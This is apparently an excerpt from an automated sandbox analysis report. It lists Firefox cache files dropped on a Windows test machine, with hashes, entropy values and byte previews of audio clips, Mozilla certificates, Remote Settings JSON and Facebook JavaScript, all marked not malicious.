                                                                                                                                                                                  Preview:... ftypM4A ....M4A mp42isom.......gmoov...lmvhd.............D..8.................................................@...................................trak...\tkhd....................8.................................................@...............mdia... mdhd.............D..8.U......"hdlr........soun.................?minf....smhd...........$dinf....dref............url ........stbl...gstsd...........Wmp4a.........................D.....3esds........"........@.............................stts....................stsc.......................Lstsz...................................i...................z...w...m...M....stco................udta....meta......."hdlr........mdirappl.............rilst...!.nam....data........speak_now....cpil....data.............pgap....data.............tmpo....data.............(.too... data........iTunes 12.3.1.23....----....mean....com.apple.iTunes....name....iTunSMPB....data........ 00000000 00000840 00000151 0000000000002E6F 00000000 00000000 00000000 0000

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\3B0E3359E0372079E392AB8A0769FA6B4334E48F

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8054
                                                                                                                                                                                  Entropy (8bit):6.040947118500706
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:keMdWebgQX2GZaRZEyFYpoGAVQUy0tikpxgMIRGXpMbm5uZGebZovEckKLUcuKLc:qWebV2GZuZrFK0k0t7qW0NbZovEp/h
                                                                                                                                                                                  MD5:9028A57A57D25CADFB820DA154F8F3B8
                                                                                                                                                                                  SHA1:F408D85B2290D022BDFCB107DD9B76CFB3D8BDC7
                                                                                                                                                                                  SHA-256:5054FB371C24DBBE0AEC4A3BD192763B539E23D6DEE2403AEB2BCBF08EE743E0
                                                                                                                                                                                  SHA-512:D84DD687804949105F708A882DDFE5FBD885D4D6E7FA7F247AF0289FB10DB9E33E412455939A2BFCDCA971B094B2D82AB5D2ACE74D81B1C3CB838DFFC2D7D03E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:\(}a........e...e...F.A.e...........a,~1708514995,:https://incoming.telemetry.mozilla.org/submit/firefox-desktop/messaging-system/1/b3e287d1-bcec-4242-9158-4e1296363490.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEAOQFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAAX1MIIF8TCCA9mgAwIBAgIQAeBji5rfnEKbkKRvGDdhcDANBgkqhkiG9w0BAQsFADCBkjELMAkGA1UEBhMCVVMxEzARBgNVBAgMCkNhbGlmb3JuaWExFjAUBgNVBAcMDVNhbiBGcmFuY2lzY28xKjAoBgNVBAoMIVRoZSBVbml2ZXJzZSBTZWN1cml0eSBDb21wYW55IEx0ZDEqMCgGA1UEAwwhVGhlIFVuaXZlcnNlIFNlY3VyaXR5IENvbXBhbnkgTHRkMB4XDTI0MDIyMDExMzA0MVoXDTI1MDIxOTExMzA0MVowgYExCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRYwFAYDVQQHEw1TYW4gRnJhbmNpc2NvMRwwGgYDVQQKExNNb3ppbGxhIENvcnBvcmF0aW9uMScwJQYDVQQDEx5pbmNvbWluZy50ZWxlbWV0cnkubW96aWxsYS5vcmcwggEgMA0GCSqGSIb3DQEBAQUAA4IBDQAwggEIAoIBAQC6fSGp+3k/jYV0wKkW3gQZCsFMiAetEX3hSKGyBO522ckT4qIKL2PhqeOVfpasu6OKrBlaTER1jL9E7t7Fe1dm9pM4RfkTRwojdnStBkZhLEAthazf5IuZoKClyIQOBeB

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\3D2EE65213655611AE063776EA786EF2A8F7901B

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ISO Media, Apple iTunes ALAC/AAC-LC (.M4A) Audio
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):22171
                                                                                                                                                                                  Entropy (8bit):6.187297046751415
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:M6CIgwJ0xmmS5Yvd7VqN4mApqN3Xo70tNo+pwPm082nyFz/wRsRz:MBpwqBgYuApQHkKo+pwPo2O
                                                                                                                                                                                  MD5:963A94FA94936F874F1E3763A015343F
                                                                                                                                                                                  SHA1:2A1125D0330F346D74AEA0EA876271CBE6BAC937
                                                                                                                                                                                  SHA-256:E31A4CE49DDAB2545D007FAAA677D1ABCA64639AB4053F4EC347A6A13E0C594C
                                                                                                                                                                                  SHA-512:88FB65BDB70964A734799276E62A67EE5207070D9349B82DD6A29CFD4E980A3CBBD95FA1CC38DB6BDE082C22D53552015E5517B680B2F1B93448CA126C2FCB65
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:... ftypM4A ....M4A mp42isom........moov...lmvhd.............D..T.................................................@...................................trak...\tkhd....................T.................................................@...............mdia... mdhd.............D..T.U......"hdlr........soun.................[minf....smhd...........$dinf....dref............url ........stbl...gstsd...........Wmp4a.........................D.....3esds........"........@.............................stts....................stsc.......................hstsz.......................~.......k...................a...c...[...Z...c...`...d..._...^...\...e..."....stco................udta....meta......."hdlr........mdirappl.............nilst.....nam....data........error....cpil....data.............pgap....data.............tmpo....data.............(.too... data........iTunes 12.3.1.23....----....mean....com.apple.iTunes....name....iTunSMPB....data........ 00000000 00000840 00000063 0000000000004B5D 0000000

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\3D738F47CFFED8D6BAEA1251409167E90988B9ED

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:PEM certificate
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):12974
                                                                                                                                                                                  Entropy (8bit):6.043140114486337
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:H/UXu9fiGLm4pUuE0M6dtE0M6dwtLuQ9Qs:fU+Bi8mCUuE56dtE56dw3
                                                                                                                                                                                  MD5:52C2C98BEFCA3DEF0EE5F2B48A5A9215
                                                                                                                                                                                  SHA1:5CB94B53EDE791B7F4F263068A8C2ADD4893AA31
                                                                                                                                                                                  SHA-256:9D3528E4642997F3295348BF82A2E50704BFC9EED443781883AEBC2F5652DF32
                                                                                                                                                                                  SHA-512:FAE7D8FB749B83E74C34322B3037F763C83E047859C0D3B3695A74A07BD85E271340C2C13947A7F879A1F9111BF614247F32D53FE7F34A38344DF4CCE33D83E3
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:-----BEGIN CERTIFICATE-----.MIIC6zCCAnGgAwIBAgIIF7VKXdRkQA0wCgYIKoZIzj0EAwMwgaMxCzAJBgNVBAYT.AlVTMRwwGgYDVQQKExNNb3ppbGxhIENvcnBvcmF0aW9uMS8wLQYDVQQLEyZNb3pp.bGxhIEFNTyBQcm9kdWN0aW9uIFNpZ25pbmcgU2VydmljZTFFMEMGA1UEAww8Q29u.dGVudCBTaWduaW5nIEludGVybWVkaWF0ZS9lbWFpbEFkZHJlc3M9Zm94c2VjQG1v.emlsbGEuY29tMB4XDTI0MDEyMDE0MzY0MFoXDTI0MDQwOTE0MzY0MFowgZ0xCzAJ.BgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRYwFAYDVQQHEw1Nb3VudGFp.biBWaWV3MRwwGgYDVQQKExNNb3ppbGxhIENvcnBvcmF0aW9uMRcwFQYDVQQLEw5D.bG91ZCBTZXJ2aWNlczEqMCgGA1UEAxMhYXVzLmNvbnRlbnQtc2lnbmF0dXJlLm1v.emlsbGEub3JnMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEhDqYyZXmCDrvqwfYqf5i.mRLlkELylFrgvk2huv1NnTWW1Enjx3DNcWKjsvDj3fj80i7kDwh+kW20tT5klXzD.9CRHPEmcWKCWMlMPEI2CtAdQFzb/KlrNPUTboGdFqI2Uo3YwdDAOBgNVHQ8BAf8E.BAMCB4AwEwYDVR0lBAwwCgYIKwYBBQUHAwMwHwYDVR0jBBgwFoAUoB1KF0+Mwis1.RfFj8dpwcKfO+OEwLAYDVR0RBCUwI4IhYXVzLmNvbnRlbnQtc2lnbmF0dXJlLm1v.emlsbGEub3JnMAoGCCqGSM49BAMDA2gAMGUCMFfPsr/HoirLhX6U0iA5kD8RRDfM.OmujRg3ILEcuDd/d6adlUrUK5h4+IHR9TgoeSAIxAPfJwg1TyGrR4MMh9h7FJo

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\3DE122AF51E9C396743DA36D6F24FC9288BA6D86

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):10991
                                                                                                                                                                                  Entropy (8bit):6.088519108242144
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:38YPmO+FaPYep0Bz+eyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWdADz3:MYAUeLYGBRohB1r1uk/KiFTaIdaMJ
                                                                                                                                                                                  MD5:2568F138EFFCAC57B74AE3A0D0BC6D6F
                                                                                                                                                                                  SHA1:90965214A84E5AC1F65AD286C244ED4AA0665A5D
                                                                                                                                                                                  SHA-256:88BF7AEAB36682E097AF762B4C55153BD32AED1DBB6BF170947DF014970C8AEE
                                                                                                                                                                                  SHA-512:4E1740A77DE32C7790655BAC6A06D4F66AC4A5E212B6D941D84D976B06DD546D834649516E8CDECF1501C65366B374C4432BA3381ACADFB0EAB1708F2C252DFA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"metadata":{"sort":"-last_modified","schema":{"type":"object","title":"The root schema","$schema":"http://json-schema.org/draft-07/schema","default":{},"examples":[{"id":"cloudflare-US","uri":"https://mozilla.cloudflare-dns.com/dns-query","UIName":"Cloudflare","autoDefault":true,"canonicalName":""}],"required":["id","uri"],"properties":{"id":{"$id":"#/properties/id","type":"string","title":"Provider ID","default":"","examples":["cloudflare-US"],"description":"A unique identifier for the provider, for referencing in regional config"},"uri":{"$id":"#/properties/url","type":"string","title":"Provider endpoint URI","default":"","examples":["https://mozilla.cloudflare-dns.com/dns-query"],"description":"Used directly as the provider's DoH endpoint URI"},"UIName":{"$id":"#/properties/UIName","type":"string","title":"UI Name","default":"","examples":["Cloudflare"],"description":"Provider name to display in UI. Provider will not be shown in UI if omitted"},"autoDefault":{"$id":"#/properties/au

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\3FA5BCF279D30840A35DE8A0D44B987834E940A5

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):15948
                                                                                                                                                                                  Entropy (8bit):6.070859937802444
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:P7VqN4mApqN3Xo70tNo+pwPm082nyFz/aOw:EApQHkKo+pwPo2J
                                                                                                                                                                                  MD5:66DC97BC473D2ED80A47A8F8956BC13C
                                                                                                                                                                                  SHA1:1FED223B814B9C940B743259097494D94CCD9B85
                                                                                                                                                                                  SHA-256:8E680B62AA52939FCA3C63DFA325D110FAECCD53ACEAE81239ECE999220EEB9C
                                                                                                                                                                                  SHA-512:B479D60E703B79E9064F3A6731133A8EE952FA45BE517262B67A0EA8D18BF5A2F632ECB7F3343D008CEB5270F05D4DE6D6E4D0A62CCEB1DF10F71B1E99EA5954
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.... ..R%.\.%sv.....}...ht~..s..P..6].A...ro....-FY..-..N....(".....T.."..Y...m.b. = ...UU...:5.-.i>..gj....$.g#..]...........:K5a./f. .U.H..t....:..7.D...F....fAl'.}..e......q.8.9..X..r......;. .....F.*.A......n.Y......}..$0z....N.v.D.....N.......r.............e.."F.B.g.....k....O^partitionKey=%28https%2Cyoutube.com%29,:https://www.youtube.com/s/desktop/87423d78/cssbin/www-onepick.css.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEAOQFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAA5iMIIOXjCCDUagAwIBAgIRAJKc339ZwIrpCZuMyXFusEowDQYJKoZIhvcNAQELBQAwRjELMAkGA1UEBhMCVVMxIjAgBgNVBAoTGUdvb2dsZSBUcnVzdCBTZXJ2aWNlcyBMTEMxEzARBgNVBAMTCkdUUyBDQSAxQzMwHhcNMjQwMTI5MDgwNDQ3WhcNMjQwNDIyMDgwNDQ2WjAXMRUwEwYDVQQDDAwqLmdvb2dsZS5jb20wWTATBgcqhkjOPQIBBggqhkjOPQMBBwNCAASB6wVGdBTGrYTNLOgcSDG0+J3gPo8rFeHbl1W+ZIBjbbIlAbGtcHWlO5LiWvX/9Ra4EykTj2Z2HH1qM2RuWespo4IMPzCCDDswDgYDVR0PAQH/BAQDAgeAMBMGA1UdJQQMMAoGCCsGAQUFBwMBMA

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\3FA976C8E05396C08EBF36C42C502B7FB515F142

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):30952
                                                                                                                                                                                  Entropy (8bit):7.488427511749104
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:RfIprxJuDyB/oeyQFd2SYxQUnoSV9dyzkRx+oy7VqN4mApqN3Xo70tNo+pwPm084:RfIpPBf3Ohnoi3yI+AApQHkKo+pwPo2L
                                                                                                                                                                                  MD5:3C7AAB45C94D8C0A5C62679F63FED621
                                                                                                                                                                                  SHA1:224A398F054B62DC9D722267186428B49FD6EFDD
                                                                                                                                                                                  SHA-256:357DFBD71B1EC10E0C5806D6C022547A95CAED0AB522DF56D5B54053771B6E63
                                                                                                                                                                                  SHA-512:DFF301D6D9EF8C19E2601ABC1F75E873063EE386A6694ECE6EEBEC3F19F9EC07358657FB71F7D9C24E92AFBB265E65BE0C448190AFB658DE13FA51ECD7E8DFE8
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.h0......"0n.c...............!9.....Cz..i_...,...........e]6.rI9.)2>R)..d3).....R.W..4...... .........~3...`O0.+.<..9r...@.k.X9O.E.*..2..pU..VDB...C.JO..O......=....no..S....!..3...3.........Z{........a......._M.W.|....b....a.v.!M..Se.c..P.-09.0.].@.Y>.a.0O...K7uW..7.W...)1.....*.N....q..(...c...."..*..L1...u....Xl>Jm..~..as..|..v=.0.i-...1.....T...l:..OJ.)F...B.J..).=.y3.4a{....D.M.M.z6....^=?<.a....._/.WOO....g.....}xy...l..d...k~}x.....d. A.L.+..f.e..n.9..(un....M.%v...=g.n{.....L.Z^..^..._x........:.;..l.;.....r..[U.....iz.{[VV..+.E$u..TG....6Y....).....V.dUO<.A}7..CUk]-....%.R.H.R+..D.XYB=sU.'.}....S.....A{..9......{....p..,.k.......(w...,C.5Gm........c..,h.G8+.7X.VGs..MW.......V.X.r...8q8]b..)."Mf..T...,|oJiz.bk....n...G....`:....i....EZ(|.]...B...q........4..N..5.e.....1d.N9...>..>...!B.z.d.x..i.t.>....mkty.....Y...E.E...........?....,.B3...4Q.`..<.@eq...V.?/.a......i.o.i....w.u......m.E.{.m......m{.g.[\-.q./..Z.eF.

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\401D5297208D95672FEADD74907A217F0A25EE68

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (3274)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):466198
                                                                                                                                                                                  Entropy (8bit):5.470151995228632
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:i7gniZbz80T44cQr9yTkXsOMlZITy+AEJO5M4PLCHkShkCrfa3/1UGRA32es6J8K:iph9yTkXNMITyRbuHfa+hs6J8K
                                                                                                                                                                                  MD5:1142F6D2771CA36BAD8A92A28A54C6FC
                                                                                                                                                                                  SHA1:BCE84D05FBD89B1CBD9B7F590E60C979243D2C8C
                                                                                                                                                                                  SHA-256:5E397B15E7ABF3528EFA3D6A02BB064557BB0670550FF081F9E6A40B92CD7C10
                                                                                                                                                                                  SHA-512:D60FCC742382FA2FC93BC18FFDB108762DDD5B7D1562555DDA25BF910F886C5E0069100275B64628C9FD7C6D596F881E1B52231DBD4EEE0204A421001D4C7115
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("CometSetDenseModeMutation_facebookRelayOperation",[],(function(a,b,c,d,e,f){e.exports="4486145264820781"}),null);.__d("CometSetDenseModeMutation.graphql",["CometSetDenseModeMutation_facebookRelayOperation"],(function(a,b,c,d,e,f){"use strict";a=function(){var a=[{defaultValue:null,kind:"LocalArgument",name:"input"}],c=[{alias:null,args:[{kind:"Variable",name:"input",variableName:"input"}],concreteType:"SetDenseModeResponsePayload",kind:"LinkedField",name:"set_dense_mode",plural:!1,selections:[{alias:null,args:null,concreteType:"Viewer",kind:"LinkedField",name:"viewer",plural:!1,selections:[{alias:null,args:null,kind:"ScalarField",name:"dense_mode_setting",storageKey:null}],storageKey:null}],storageKey:null}];return{fragment:{argumentDefinitions:a,kind:"Fragment",metadata:null,name:"CometSetDenseModeMutation",selections:c,type:"Mutation",abstractKey:null},kind:"Request",operation:{argumentDefinitions:a,kind:"Operation",name:"CometSetDenseModeMutation",selections:

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\40EE86962A167F85FF635E63C180D94A8BE50B96

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ISO Media, Apple iTunes ALAC/AAC-LC (.M4A) Audio
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):22278
                                                                                                                                                                                  Entropy (8bit):6.212801708897808
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:j60I1WUgmIu6RM7VqN4mApqN3Xo70tNo+pwPm082nyFz/kRphRp/:jcWUgXApQHkKo+pwPo2VV/
                                                                                                                                                                                  MD5:7F8E33963042A04FE19019089CBC8B3B
                                                                                                                                                                                  SHA1:393E9A0A496E9ED1AED3DC643A008FF2A009C2FB
                                                                                                                                                                                  SHA-256:21C11177A11F20E1B0CED43AAAC23AE4D222D05168BF31CA1E2B6DB7053E5495
                                                                                                                                                                                  SHA-512:1FCB36F7C38F8CDCA26CE982CC565B84E3308F1E73A339683B617B64AE6D93712343D4A6A521B543EC8CF83DF62BE478F77C06549CC29D194099958172DD6DB3
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:... ftypM4A ....M4A mp42isom........moov...lmvhd.............D..T.................................................@...................................trak...\tkhd....................T.................................................@...............mdia... mdhd.............D..T.U......"hdlr........soun.................[minf....smhd...........$dinf....dref............url ........stbl...gstsd...........Wmp4a.........................D.....3esds........"........@.............................stts....................stsc.......................hstsz...............................................n...f...`...k...j...f...h...a...i...e...i...b........stco................udta....meta......."hdlr........mdirappl.............oilst.....nam....data........got_it....cpil....data.............pgap....data.............tmpo....data.............(.too... data........iTunes 12.3.1.23....----....mean....com.apple.iTunes....name....iTunSMPB....data........ 00000000 00000840 000002AB 0000000000004915 000000

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\463486665093FCEECBC388E5A3D0B71138B36702

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):10349
                                                                                                                                                                                  Entropy (8bit):6.08600943799439
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:KM/TKAoHBneyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWdu2Rdu2A:KM/TueLYGBRohB1r1uk/KiFTaIda9u
                                                                                                                                                                                  MD5:36B6A2DA66565EE633886B3FD97FF086
                                                                                                                                                                                  SHA1:6EE24DDEF3E27A919B2DB6FA117111FF626CB6FC
                                                                                                                                                                                  SHA-256:C71CDAF90A86DBC3979FFECC77E7B06F64D0DC4E8E26ABF93A9DBBFF1D075B6F
                                                                                                                                                                                  SHA-512:6974691973D73E82A811D65824B439B9975F8998A74A0134ECA93D829B3C6910B0B59154B356F5757EC67DADBEBF3FE16B50742F5A66C19E82D08296B45090ED
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"metadata":{"schema":{"type":"object","required":["id"],"properties":{"id":{"type":"string","default":"AddonManagerSettings","description":"The default id should NOT be changed, unless there is a specific need to create separate collection entries which target or exclude specific Firefox versions."},"filter_expression":{"type":"string","optional":true,"description":"This is NOT directly used by AMRemoteSettings, but has special functionality in Remote Settings.\nSee https://remote-settings.readthedocs.io/en/latest/target-filters.html#how"},"installTriggerDeprecation":{"$ref":"#/definitions/installTriggerDeprecation","optional":true}},"definitions":{"installTriggerDeprecation":{"type":"object","properties":{"extensions.InstallTrigger.enabled":{"type":"boolean","default":false,"description":"Show/Hide the InstallTrigger global completely (both the global and its methods will not be accessible anymore). IMPORTANT: The webcompat team should be consulted before turning this to false, becau

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\4832D199584363B876D3E7D57CA02A9B0F4D91CD

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:PEM certificate
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):12989
                                                                                                                                                                                  Entropy (8bit):6.04091430862057
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:Hhyu9fiGLm4pUVE0M6dtE0M6dwtL2Zl8lI:FBi8mCUVE56dtE56dwcR
                                                                                                                                                                                  MD5:EADA4FAE208B6B4976E22867563BD7C8
                                                                                                                                                                                  SHA1:D59258A2C4CEF63F4E44D1232892BFEF37B579AB
                                                                                                                                                                                  SHA-256:423B33014CC96D80C73DE8320C7D235B0EFA15A0995FF09BB484A17E137415CA
                                                                                                                                                                                  SHA-512:F3DD44475FAA4A80A0E17EE2F110CF6570AD3C00CF2E8E9C523BBCCB0FBFEBC55BAAE113F5F4643E5106488705340C9A85F45AB1423C4447DF9B7439E64B4179
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:-----BEGIN CERTIFICATE-----.MIIDBjCCAougAwIBAgIIF68YC/b1N40wCgYIKoZIzj0EAwMwgaMxCzAJBgNVBAYT.AlVTMRwwGgYDVQQKExNNb3ppbGxhIENvcnBvcmF0aW9uMS8wLQYDVQQLEyZNb3pp.bGxhIEFNTyBQcm9kdWN0aW9uIFNpZ25pbmcgU2VydmljZTFFMEMGA1UEAww8Q29u.dGVudCBTaWduaW5nIEludGVybWVkaWF0ZS9lbWFpbEFkZHJlc3M9Zm94c2VjQG1v.emlsbGEuY29tMB4XDTIzMTIzMTEwMDcwM1oXDTI0MDMyMDEwMDcwM1owgakxCzAJ.BgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRYwFAYDVQQHEw1Nb3VudGFp.biBWaWV3MRwwGgYDVQQKExNNb3ppbGxhIENvcnBvcmF0aW9uMRcwFQYDVQQLEw5D.bG91ZCBTZXJ2aWNlczE2MDQGA1UEAxMtcmVtb3RlLXNldHRpbmdzLmNvbnRlbnQt.c2lnbmF0dXJlLm1vemlsbGEub3JnMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE9/8s.qFZ+dU3XKZO6K+T1Ez9wiWI18wv2atOP1JBioLK9RDzM+2lP3hcnmkdKPoF54BBc.rrUruEYcLg7gsw2EWoqGzqOXmUVf5aDVfUHQxV8aW4x3H/oT0qGFXgDFHb+to4GD.MIGAMA4GA1UdDwEB/wQEAwIHgDATBgNVHSUEDDAKBggrBgEFBQcDAzAfBgNVHSME.GDAWgBSgHUoXT4zCKzVF8WPx2nBwp8744TA4BgNVHREEMTAvgi1yZW1vdGUtc2V0.dGluZ3MuY29udGVudC1zaWduYXR1cmUubW96aWxsYS5vcmcwCgYIKoZIzj0EAwMD.aQAwZgIxALPmOSBrIfgQlrVZ6pop/EoOUGMMZTxt0NdQqcdr5IPi+vDJ6c5sWS

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\4A310EEF15BA8905EFB4A4C053A96628E368E3B3

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):9349
                                                                                                                                                                                  Entropy (8bit):6.108152827038933
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:Y1duwBNeyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWdBORdBOX:ydeLYGBRohB1r1uk/KiFTaIdaEq
                                                                                                                                                                                  MD5:F41CC5246C854D2540DD5DD0E4A7BA16
                                                                                                                                                                                  SHA1:87B69ED55D7468713F1552343836B11EFE898B60
                                                                                                                                                                                  SHA-256:91BAB762FDAD34E5C4D2DC956FA3EADAFDE5AE6E65A300054FDA6CA45885F420
                                                                                                                                                                                  SHA-512:15018D31A387D28E10E03474AD06F0391545E551DD249B71DC8F1C3129AC63363C4D51E01C898C66A86609EAB0E24B36874766C8867B2B640F193E78C2551DF4
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"permissions":{},"data":{"schema":{"type":"object","required":["description","hosts"],"properties":{"hosts":{"type":"array","items":{"type":"string"},"description":"List of hosts where this recipe applies."},"pathRegex":{"type":"string","description":"Match certain paths."},"description":{"type":"string","description":"Site description."},"passwordSelector":{"type":"string","description":"CSS selector of the password field."},"usernameSelector":{"type":"string","description":"CSS selector of the username field."},"notPasswordSelector":{"type":"string","description":"CSS selector to exclude fields as password."},"notUsernameSelector":{"type":"string","description":"CSS selector to exclude fields as username."}},"description":"Password recipes"},"signature":{"ref":"jdpt083xjysc3ibcann9jp9e8","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-03-20-10-07-03.chain","mode":"p384ecdsa","type":"contentsignaturepki","signature":"PL0XYs

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\4BBDB7D3505B257780A6EE268A25DF671754FCB0

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8054
                                                                                                                                                                                  Entropy (8bit):6.041541613261199
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:VoMdWebgQX2GZaRZEyFYpoGAVQUy0tikpxgMIRGXpMbm5uZGebZovEckALUcuALc:pWebV2GZuZrFK0k0t7qW0NbZovEplH
                                                                                                                                                                                  MD5:C1F176378BBDFED2A99DFCC1B8D48AAF
                                                                                                                                                                                  SHA1:0D6D8AE51E7E97F6710B25C4C0363494422CF5E0
                                                                                                                                                                                  SHA-256:974EBFC85E54E1535DE31B2E84FE6E6F02D6B0BE308EBC449894EAD04C98DFD2
                                                                                                                                                                                  SHA-512:C224D8877A7BA83D65AB79F41ACCD8EB2CEFA2BFAD7FC0EFB08174C650F22234FC7C5F834C601C265E1EABBAE53AE8AEABF10161D498070612A980D1BFDCA1EF
                                                                                                                                                                                  Malicious:false
